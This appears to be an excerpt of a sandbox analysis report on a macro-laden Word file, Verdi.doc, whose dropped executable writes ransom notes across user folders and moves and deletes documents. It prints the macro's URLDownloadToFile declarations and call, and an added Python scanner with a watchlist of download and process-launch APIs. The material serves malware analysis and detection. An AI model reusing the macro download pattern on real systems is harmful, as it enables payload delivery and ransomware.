Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\internet explorer\userdata\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\mmc\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\office\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\office\recent\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\proof\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\protect\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\protect\s-1-5-21-312302014-279660585-3511680526-1004\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\speech\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\systemcertificates\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\certificates\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\crls\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\ctls\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\templates\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\managed\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\managed\document themes\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\managed\document themes\1033\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\managed\smartart graphics\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\managed\smartart graphics\1033\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\managed\word document building blocks\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\managed\word document building blocks\1033\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\user\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\user\document themes\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\user\document themes\1033\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\user\smartart graphics\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\user\smartart graphics\1033\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\user\word document building blocks\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\user\word document building blocks\1033\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\uproof\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\cookies\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\cookies\low\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\dntexception\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\dntexception\low\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\iecompatcache\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\iecompatcache\low\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\iecompatuacache\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\iecompatuacache\low\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\iedownloadhistory\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\libraries\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\network shortcuts\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\printer shortcuts\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\privacie\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\privacie\low\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\recent\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\recent\automaticdestinations\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\recent\customdestinations\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\recent items\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\sendto\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\start menu\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\accessories\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\administrative tools\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\maintenance\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\templates\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\windows\themes\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\word\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\word\startup\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\mozilla\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\mozilla\extensions\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\mozilla\firefox\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\mozilla\firefox\crash reports\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\mozilla\firefox\crash reports\events\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\bookmarkbackups\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\crashes\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\crashes\events\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\datareporting\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\datareporting\archived\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\datareporting\archived\2016-12\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\gmp\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\gmp\winnt_x86-msvc\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\gmp-eme-adobe\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\gmp-eme-adobe\15\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\gmp-gmpopenh264\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\gmp-gmpopenh264\1.5.3\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\healthreport\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\minidumps\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\saved-telemetry-pings\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\sessionstore-backups\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\storage\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\storage\permanent\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\storage\permanent\chrome\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\storage\permanent\chrome\idb\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\storage\permanent\chrome\idb\2918063365piupsah.files\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\idb\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\webapps\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\sun\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\sun\java\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\sun\java\deployment\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\contacts\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\desktop\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\desktop\bnagmgsplo\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\desktop\eowrvpqccs\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\desktop\gaobcviqij\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\desktop\palrgucveh\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\desktop\qncycdfijj\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\desktop\sqsjkebwdt\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\documents\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\documents\bnagmgsplo\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\documents\eowrvpqccs\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\documents\gaobcviqij\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\documents\my music\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\documents\my pictures\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\documents\my videos\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\documents\palrgucveh\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\documents\qncycdfijj\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\documents\sqsjkebwdt\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\downloads\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\favorites\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\favorites\links\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\favorites\links for united states\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\links\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\recent\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\saved games\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\searches\decrypt-files.txtJump to behavior
Modifies existing user documents (likely ransomware behavior)
Source: C:\Windows\Temp\wupd12.14.tmp | File moved: C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx
Source: C:\Windows\Temp\wupd12.14.tmp | File deleted: C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx
Source: C:\Windows\Temp\wupd12.14.tmp | File moved: C:\Users\user\Desktop\GAOBCVIQIJ\QNCYCDFIJJ.xlsx
Source: C:\Windows\Temp\wupd12.14.tmp | File deleted: C:\Users\user\Desktop\GAOBCVIQIJ\QNCYCDFIJJ.xlsx
Source: C:\Windows\Temp\wupd12.14.tmp | File moved: C:\Users\user\Desktop\QCFWYSKMHA.pdf

System Summary:

Document contains an embedded VBA macro with suspicious strings
Source: Verdi.doc | OLE, VBA macro line: Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Source: Verdi.doc | OLE, VBA macro line: Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Source: Verdi.doc | OLE, VBA macro line: Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Source: Verdi.doc | OLE, VBA macro line: Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Source: Verdi.doc | OLE, VBA macro line: URLDownloadToFile 0, v1, v2, 0, 0
Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function dwn1, String urldownloadtofile: URLDownloadToFile 0, v1, v2, 0, 0 | Name: dwn1
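The macro lines above are the whole download stage of this sample: a `Declare` of `urlmon!URLDownloadToFileA` (in both the PtrSafe and the legacy form) and a single call to it from `dwn1`. The following scanner, added here as an example and not part of the Joe Sandbox report or its engine, takes VBA source as a tool such as olevba extracts it, flags declarations whose library/symbol pair is on a watchlist, and reports the lines on which the macro actually calls each one. The watchlist and all function names are this example's own; the sample VBA is constructed from the lines quoted in the report, and wrapping the two declarations in an `#If VBA7` block is an assumption about how the module is laid out.

```python
"""Flag Win32 API declarations in VBA source that a macro can use to fetch and
stage a payload, and locate where the macro calls them.

Added example (not Joe Sandbox code). Feed it VBA text extracted with olevba
or a similar tool. SAMPLE_VBA is constructed from the report's Declare and
call lines; the '#If VBA7' wrapper is an assumption about module layout."""
import re
from dataclasses import dataclass, field

# Constructed watchlist of (library, exported symbol) pairs. An A/W suffix on
# the symbol is tolerated so both ANSI and wide variants match.
WATCHLIST = {
    ("urlmon", "URLDownloadToFile"): "downloads a file from a URL to disk",
    ("urlmon", "URLDownloadToCacheFile"): "downloads a file into the IE cache",
    ("wininet", "InternetOpenUrl"): "opens a URL via WinINet",
    ("kernel32", "WinExec"): "launches a program",
    ("kernel32", "CreateProcess"): "launches a program",
    ("shell32", "ShellExecute"): "launches a program or opens a URL",
}

# Declare [PtrSafe] Function|Sub <name> Lib "<lib>" [Alias "<alias>"] ...
DECLARE_RE = re.compile(
    r"""^\s*(?:(?:Public|Private)\s+)?Declare\s+(?P<ptrsafe>PtrSafe\s+)?
        (?:Function|Sub)\s+(?P<name>\w+)\s+Lib\s+"(?P<lib>[^"]+)"
        (?:\s+Alias\s+"(?P<alias>[^"]+)")?""",
    re.IGNORECASE | re.VERBOSE | re.MULTILINE,
)


@dataclass
class Finding:
    vba_name: str   # name the macro code uses
    library: str    # DLL from Lib "..." (without .dll)
    symbol: str     # exported symbol: the Alias if present, else vba_name
    ptrsafe: bool   # True for the 64-bit-safe declaration form
    reason: str
    call_lines: list = field(default_factory=list)  # 1-based lines that call it


def find_suspicious_declares(vba_src: str) -> list[Finding]:
    findings = []
    lines = vba_src.splitlines()
    for m in DECLARE_RE.finditer(vba_src):
        lib = m.group("lib").lower().removesuffix(".dll")
        symbol = m.group("alias") or m.group("name")
        key = (lib, symbol)
        if key not in WATCHLIST and symbol[-1:] in ("A", "W"):
            key = (lib, symbol[:-1])          # URLDownloadToFileA -> URLDownloadToFile
        if key not in WATCHLIST:
            continue
        f = Finding(m.group("name"), lib, symbol, bool(m.group("ptrsafe")), WATCHLIST[key])
        # Call sites: any line using the VBA name that is not itself a Declare.
        call_re = re.compile(rf"\b{re.escape(f.vba_name)}\b", re.IGNORECASE)
        for lineno, line in enumerate(lines, 1):
            if call_re.search(line) and not DECLARE_RE.match(line):
                f.call_lines.append(lineno)
        findings.append(f)
    return findings


# Constructed from the report's macro lines; the #If VBA7 block is assumed.
SAMPLE_VBA = '''\
#If VBA7 Then
    Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#Else
    Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#End If

Function dwn1(v1 As String, v2 As String)
    URLDownloadToFile 0, v1, v2, 0, 0
End Function
'''

if __name__ == "__main__":
    for f in find_suspicious_declares(SAMPLE_VBA):
        form = "PtrSafe" if f.ptrsafe else "legacy"
        print(f"{f.library}!{f.symbol} as {f.vba_name} ({form}): {f.reason}; called on lines {f.call_lines}")
```

Both declarations are reported separately, which matches how the report lists them; the call-site list is what tells an analyst that the download function is reachable from `dwn1` rather than merely declared.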
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Windows\Temp\wupd12.14.tmp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GKZSIVUJ\wordupd[1].tmp
Contains functionality to communicate with device drivers
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_00401430: DeviceIoControl
Creates files inside the system directory
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Windows\Temp\wupd12.14.tmp
Creates mutexes
Source: C:\Windows\Temp\wupd12.14.tmp | Mutant created: \Sessions\1\BaseNamedObjects\Global\5e4c085c3c4e0000
Detected potential crypto function
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_00423849
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_0040C460
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_00406273
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_00409230
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_00406CF0
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_00437560
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219EF
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C5A40
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C6853
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C7E65
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C3275
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C6A0D
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004CD408
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C860B
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C9207
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004CC018
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C5C1B
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C7A3C
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004CCED8
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004CC6D0
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C98D2
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C16EF
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C3CE1
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C6EF0
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C668E
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004CBE83
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C909D
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C1894
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C9A95
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C70A7
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C134E
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C2F44
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004DA346
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C895D
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C476D
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C6B77
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C3970
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004CD770
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C9700
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C2103
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C3B3C
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C6139
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004D8B38
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C633B
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C6D33
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004DBBCE
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C5DC3
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004DB1EC
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004CB3EB
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004CA1F8
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C33F4
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004CA989
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C2D84
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C8B98
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C3597
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004CCB92
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C2BAE
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C5FA4
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C37A0
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C9FA2
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004C51B2
Document contains embedded VBA macros
Source: Verdi.doc | OLE indicator, VBA macros: true
Document contains no OLE stream with summary information
Source: Verdi.doc | OLE indicator has summary info: false
Source: Verdi.doc | OLE indicator has summary info: false
Document has an unknown application name
Source: Verdi.doc | OLE indicator application name: unknown
Source: Verdi.doc | OLE indicator application name: unknown
Dropped file seen in connection with other malware
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GKZSIVUJ\wordupd[1].tmp (SHA-256 806FC33650B7EC35DD01A06BE3037674AE3CC0DB6BA1E3F690EE9BA9403C0627)
Source: Joe Sandbox View | Dropped File: C:\Windows\Temp\wupd12.14.tmp (SHA-256 806FC33650B7EC35DD01A06BE3037674AE3CC0DB6BA1E3F690EE9BA9403C0627)
Reads the hosts file
